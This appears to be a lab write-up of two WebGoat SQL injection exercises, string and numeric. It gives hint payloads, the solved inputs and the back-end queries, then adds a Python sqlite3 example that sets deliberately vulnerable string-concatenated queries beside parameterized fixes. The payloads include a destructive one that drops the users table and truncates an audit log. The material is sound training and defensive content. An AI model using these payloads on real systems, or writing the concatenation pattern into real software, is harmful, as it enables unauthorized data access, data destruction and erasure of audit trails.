# [ Webgoat - 2 ] SQL Injection

## Problem:

![](https://i.imgur.com/XXVW8Le.png)
![](https://i.imgur.com/Xry4cui.png)

### Try It! ***String SQL Injection***

The query in the code builds a dynamic query as seen in the previous example. The query in the code builds a dynamic query by concatenating strings making it susceptible to ***String SQL injection***:

![](https://i.imgur.com/LpV9fIq.png)

Using the form below try to retrieve all the users from the users table. You shouldn’t need to know any specific user name to get the complete list, however you can use 'Smith' to see the data for one user.

![](https://i.imgur.com/zAluSpl.png)

---------------------------------------------------------------

![](https://i.imgur.com/XXVW8Le.png)
![](https://i.imgur.com/c1G9Cpg.png)

### Try It! ***Numeric SQL Injection***

The query in the code builds a dynamic query as seen in the previous example. The query in the code builds a dynamic query by concatenating a number making it susceptible to ***Numeric SQL injection***:

![](https://i.imgur.com/nsQXL1z.png)

Using the form below try to retrieve all the users from the users table. You shouldn’t need to know any specific user name to get the complete list, however you can use '101' to see the data for one user.

![](https://i.imgur.com/sOMg1vf.png)

## Solution:

### SQL syntax:

```
"SELECT * FROM users WHERE LAST_NAME = '" + userName + "'";
```

<font color="blue">SELECT "column name" FROM "table name"; ( * : select every column )</font>

<font color="blue">WHERE + condition;</font>

---> returns every column of the rows in users whose LAST_NAME equals userName (the value you searched for)

#### Example:

==**Store_Information**== table:

| ==Store_Name== | ==Sales== | ==Txn_Date== |
| -------- | -------- | -------- |
| Los Angeles | 1500 | 05-Jan-1999 |
| San Diego | 250 | 07-Jan-1999 |
| Boston | 700 | 08-Jan-1999 |

To select all store names (Store_Name), we type:

`SELECT Store_Name FROM Store_Information;`

Output:

```
Los Angeles
San Diego
Boston
```

### WebGoat attack examples (hints):

#### Attacker supplies unexpected text

```
userName = Smith' or '1'='1
userName =' or 1=1 --
userID = 1234567 or 1=1
UserName = Smith';drop table users; truncate audit_log;--
```

#### Application executes query

```
select * from users where name = 'Smith' or '1' = '1'
select * from users where name = 'Smith' or TRUE
select * from users where employee_id = 1234567 or 1=1
```

### Answers:

```
7. ' or '1' = '1
8. 101 or 1 = 1
```

<font color="RED">Injection succeeded!</font>

### Back-end query after injection

#### 7. SELECT * FROM users WHERE LAST_NAME = '' or '1' = '1';

![](https://i.imgur.com/y6Ru9Yi.png)

#### 8. SELECT * FROM users WHERE USERID = 101 or 1 = 1;

![](https://i.imgur.com/G10SU6l.png)

###### tags: `webgoat` `SQL Injection` `CTF`
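The concatenated queries from lessons 7 and 8 beside their parameterized fixes, as an added example in Python with sqlite3 (not WebGoat's own Java code); the `users` table and its three rows are constructed here for illustration. It shows why the two answers above return every row against the concatenated query but nothing, or a type error, once the value is bound as a parameter.

```python
import sqlite3

# Constructed stand-in for the lesson's users table (not WebGoat's real schema or data).
SAMPLE_USERS = [
    (101, "John", "Smith"),
    (102, "Jane", "Doe"),
    (103, "Bob", "Jones"),
]


def make_db():
    """In-memory database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (USERID INTEGER, FIRST_NAME TEXT, LAST_NAME TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_by_name(conn, user_name):
    # Lesson 7 pattern: user text is spliced into the SQL string itself, so a quote
    # in the input closes the literal and everything after it is parsed as SQL.
    query = "SELECT * FROM users WHERE LAST_NAME = '" + user_name + "'"
    return conn.execute(query).fetchall()


def vulnerable_by_id(conn, user_id):
    # Lesson 8 pattern: no quotes at all, so any text following the number is SQL.
    query = "SELECT * FROM users WHERE USERID = " + user_id
    return conn.execute(query).fetchall()


def safe_by_name(conn, user_name):
    # Fix: a bound parameter is always one string value and never re-parsed as SQL.
    return conn.execute("SELECT * FROM users WHERE LAST_NAME = ?", (user_name,)).fetchall()


def safe_by_id(conn, user_id):
    # Fix: validate the type first (int() rejects "101 or 1 = 1"), then bind it.
    return conn.execute("SELECT * FROM users WHERE USERID = ?", (int(user_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_by_name(db, "' or '1' = '1"))  # all three rows
    print(safe_by_name(db, "' or '1' = '1"))        # []
    print(vulnerable_by_id(db, "101 or 1 = 1"))     # all three rows
    print(safe_by_id(db, "101"))                    # [(101, 'John', 'Smith')]
```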